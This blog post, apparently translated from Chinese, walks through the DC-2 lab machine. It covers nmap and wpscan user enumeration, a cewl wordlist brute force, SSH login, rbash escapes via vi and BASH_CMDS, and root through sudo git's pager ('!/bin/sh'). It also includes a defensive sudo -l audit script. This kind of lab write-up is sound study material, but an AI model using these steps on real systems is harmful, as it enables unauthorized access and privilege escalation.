DC-2靶场

Xiaoxiao

```bash
ipconfig
nmap -A 192.168.92.0/24
```

```text
Nmap scan report for dc-2 (192.168.92.135)
Host is up (0.00068s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-generator: WordPress 4.7.10
|_http-title: DC-2 – Just another WordPress site
MAC Address: 00:0C:29:67:A5:C2 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
```
```bash
nmap -p- 192.168.92.135
```

```text
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-07 00:33 EST
Nmap scan report for dc-2 (192.168.92.135)
Host is up (0.00066s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
7744/tcp open raqmon-pdu
MAC Address: 00:0C:29:67:A5:C2 (VMware)
```
```bash
nmap --script=vuln -p80,7744 192.168.92.135
```

```text
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-07 00:35 EST
Nmap scan report for dc-2 (192.168.92.135)
Host is up (0.00058s latency).

PORT STATE SERVICE
80/tcp open http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=dc-2
| Found the following possible CSRF vulnerabilities:
|
| Path: http://dc-2:80/index.php/what-we-do/%5C%22
| Form id: search-form-6750e7244cc64
| Form action: http://dc-2/
|
| Path: http://dc-2:80/index.php/our-people/%5C%22
| Form id: search-form-6750e724c5c81
|_ Form action: http://dc-2/
| http-wordpress-users:
| Username found: admin
| Username found: tom
| Username found: jerry
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /wp-login.php: Possible admin folder
| /readme.html: Wordpress version: 2
| /: WordPress version: 4.7.10
| /wp-includes/images/rss.png: Wordpress version 2.2 found.
| /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
| /wp-includes/images/blank.gif: Wordpress version 2.6 found.
| /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
| /wp-login.php: Wordpress login page.
| /wp-admin/upgrade.php: Wordpress login page.
|_ /readme.html: Interesting, a readme.
7744/tcp open raqmon-pdu
MAC Address: 00:0C:29:67:A5:C2 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 31.00 seconds
```
Key finding:

```text
| http-wordpress-users:
| Username found: admin
| Username found: tom
| Username found: jerry
```

Visiting http://dc-2/ returns nothing, because the hostname dc-2 does not resolve yet.

```bash
find / -name hosts
vim /etc/hosts
```

Add the following entry to /etc/hosts:

```text
192.168.92.135 dc-2
```

Visit http://dc-2/ again.

Flag 1:

```text
Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.
More passwords is always better, but sometimes you just can’t win them all.
Log in as one to see the next flag.
If you can’t find it, log in as another.
```

About Cewl

Cewl is a Ruby application: you point its crawler at a URL with a crawl depth, optionally let it follow external links, and it returns a wordlist that can be fed to a password cracker such as John the Ripper. Cewl also provides a command-line tool.

Usage:

```bash
cewl <url> [options]
```

Cewl can write the generated wordlist to a file:

```bash
cewl url -w dict.txt
```

```bash
cewl http://dc-2/ -w password.txt
```

We now have the usernames admin, tom and jerry, plus a password wordlist.

Scanning for the back end:

```bash
apt-get install dirsearch
```

```bash
# Scan a single URL with the default settings
dirsearch -u http://dc-2/

# Scan the target with the wordlist using the php, txt and js extensions
dirsearch -e php,txt,js -u http://dc-2/
```

```text
[00:42:30] 200 -    1KB - /wp-login.php
```

http://dc-2/wp-login.php

Alternatively: `dirb http://dc-2`

WordPress has a well-known scanner, wpscan:

```bash
wpscan --url http://dc-2/ -e u      # enumerate usernames
```

```text
[i] User(s) Identified:

[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] jerry
| Found By: Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] tom
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
```
Write the three usernames to a file:

```bash
vim user.txt
```

```text
admin
tom
jerry
```

```bash
wpscan --url http://dc-2/ -U user.txt -P password.txt
```

```text
[!] Valid Combinations Found:
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient
```

Username: jerry, Password: adipiscing
Log in as jerry; Pages -> flag2.

Flag 2:

```text
If you can't exploit WordPress and take a shortcut, there is another way.
Hope you found another entry point.
```

Besides port 80 there is also port 7744. Scan port 7744 in detail:

```bash
nmap -A -p7744 192.168.92.135
```

```text
PORT     STATE SERVICE VERSION
7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey:
| 1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
| 2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
| 256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_ 256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
MAC Address: 00:0C:29:67:A5:C2 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
```

Port 7744 is SSH. We have:
Username: jerry, Password: adipiscing
Username: tom, Password: parturient
Try logging in over SSH:

```bash
ssh jerry@192.168.92.135 -p 7744
ssh tom@192.168.92.135 -p 7744
```

jerry fails; tom logs in successfully.

```text
tom@DC-2:~$ ls
flag3.txt usr
tom@DC-2:~$ cat flag3
-rbash: cat: command not found
```

The shell is -rbash (restricted bash).

```bash
compgen -c       # list the commands that can be used
```

vi and less are available.

```text
tom@DC-2:~$ less flag3.txt
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
```

The next flag is probably in jerry's home directory.
Escaping rbash with vi: open any file with vi and enter the following commands:

```text
:set shell=/bin/sh
:shell
```
```text
$ whoami
/bin/sh: 1: whoami: not found
$ ls
flag3.txt usr
$ cd ..
$ ls
jerry tom
$ cd jerry
$ ls
flag4.txt
$ cat flag4.txt
/bin/sh: 7: cat: not found
$ less flag4.txt
```

```text
Good to see that you've made it this far - but you're not home yet.

You still need to get the final flag (the only flag that really counts!!!).

No hints here - you're on your own now. :-)

Go on - git outta here!!!!
```

```text
$ su root
/bin/sh: 10: su: not found
```

Privileges are still limited: the shell escaped rbash, but the restricted PATH is still in effect.

Escaping rbash via environment variables:

```text
┌──(root㉿kali)-[/home/kali]
└─# ssh tom@192.168.92.135 -p 7744
```

```bash
export -p                    # show the environment variables
BASH_CMDS[a]=/bin/sh;a       # bind /bin/sh to the name a, then run a
/bin/bash
export PATH=$PATH:/bin/      # extend PATH
export PATH=$PATH:/usr/bin   # extend PATH
```

The root directory is still not accessible.
Find all SUID files:

```text
tom@DC-2:/$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/procmail
/usr/bin/at
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/exim4
/bin/umount
/bin/mount
/bin/su
```

su is available, so try the jerry user with the credentials found earlier:
Username: jerry, Password: adipiscing

```bash
su jerry
sudo -l   # show the privileges of the current user (the one invoking sudo)
```

```text
Matching Defaults entries for jerry on DC-2:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
(root) NOPASSWD: /usr/bin/git
```

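The `sudo -l` output above is exactly what a defender wants to catch in a configuration review before anyone else does. As an added example (not from the original post), this Python audit parses `sudo -l` output and flags NOPASSWD rules that hand root to a binary whose pager or editor can run a command; git is the case from this box, and the rest of the watchlist is an assumption.

```python
import re

# Constructed sample reproducing the shape of the `sudo -l` output shown above.
SAMPLE_SUDO_L = r"""
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
"""

# Illustrative watchlist (an assumption; only git comes from the page): binaries whose
# pager or editor can be told to run a command, so NOPASSWD root on them is a root shell.
SHELL_CAPABLE = {"git", "vi", "vim", "less", "more", "man"}

# One rule line: "(runas_user[ : runas_group]) [TAG: ...] command[, command]"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+?)\s*$")

def _severity(command: str, nopasswd: bool, noexec: bool) -> str:
    if command == "ALL":
        return "critical"            # unrestricted root, nothing left to escalate
    name = command.split()[0].rsplit("/", 1)[-1]
    if name in SHELL_CAPABLE and not noexec:
        return "high" if nopasswd else "medium"
    return "info"

def audit_sudo_l(output: str) -> list[dict]:
    """Parse `sudo -l` output and rate each rule; returns one dict per command."""
    findings, in_rules = [], False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True              # everything after this header is a rule
            continue
        m = RULE_RE.match(line) if in_rules and line.strip() else None
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        nopasswd, noexec = "NOPASSWD" in tags, "NOEXEC" in tags
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            findings.append({"runas": runas, "command": cmd, "nopasswd": nopasswd,
                             "noexec": noexec, "severity": _severity(cmd, nopasswd, noexec)})
    return findings

if __name__ == "__main__":
    for f in audit_sudo_l(SAMPLE_SUDO_L):
        print(f"[{f['severity']}] ({f['runas']}) {f['command']} NOPASSWD={f['nopasswd']}")
```

A rule tagged NOEXEC: is rated lower because sudo then blocks the binary from executing further programs, which is the usual fix when a specific command must stay in sudoers.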
Privilege escalation via git:

```bash
sudo git -p help config
```

Then, at the pager prompt:

```text
!/bin/sh
```

```bash
sudo -l
```

```text
Matching Defaults entries for root on DC-2:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User root may run the following commands on DC-2:
(ALL : ALL) ALL
```

```bash
whoami
```

```text
root
```

```bash
sudo -i
```

```text
root@DC-2:~# ls
final-flag.txt
root@DC-2:~# cat final-flag.txt
```

```text
__ __ _ _ _ _

/ / /\ \ \___| | | __| | ___ _ __ ___ / \
\ \/ \/ / _ \ | | / _` |/ _ \| '_ \ / _ \/ /
\ /\ / __/ | | | (_| | (_) | | | | __/\_/
\/ \/ \___|_|_| \__,_|\___/|_| |_|\___\/


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.
```

  • Title: DC-2靶场
  • Author: Xiaoxiao
  • Created at : 2024-12-07 14:54:24
  • Updated at : 2024-12-07 07:30:36
  • Link: https://blog.xh8.shop/2024/12/07/DC-2靶场/
  • License: This work is licensed under CC BY-NC-SA 4.0.